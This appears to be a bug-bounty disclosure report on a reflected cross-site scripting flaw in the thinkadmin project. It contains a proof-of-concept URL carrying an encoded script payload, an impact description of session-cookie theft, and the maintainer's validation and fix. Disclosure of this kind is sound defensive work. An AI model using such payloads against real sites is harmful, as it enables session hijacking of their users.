Cross-site Scripting (XSS) - Reflected in zoujingli/thinkadmin

Valid

Reported on

Aug 25th 2021

✍️ Description

The Application is Vulnerable to reflected XSS Attack.

🕵️‍♂️ Proof of Concept

Open the following page in the browser as admin. The 商品名称 field is vulnerable to reflected XSS. An alert box is displayed as PoC.

https://testdomain11.com/data/shop.goods/index.html?cateids=941&code=94102&marks=%E8%A1%A3%E6%9C%8D&name=mLfNTqZD%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(1)%3C/ScRiPt%3E&rebate_type=0&status=0&truck_type=0&vip_entry=0

💥 Impact

Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then impersonate that user.

Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user. Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker.

References

Reflected XSS

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back 2 years ago

邹景立 validated this vulnerability 2 years ago

Melbin Mathew Antony has been awarded the disclosure bounty

The fix bounty is now up for grabs

邹景立 marked this as fixed with commit 296380 2 years ago

邹景立 has been awarded the fix bounty

This vulnerability will not receive a CVE

邹景立

commented 2 years ago

Maintainer

Test after composer update.

to join this conversation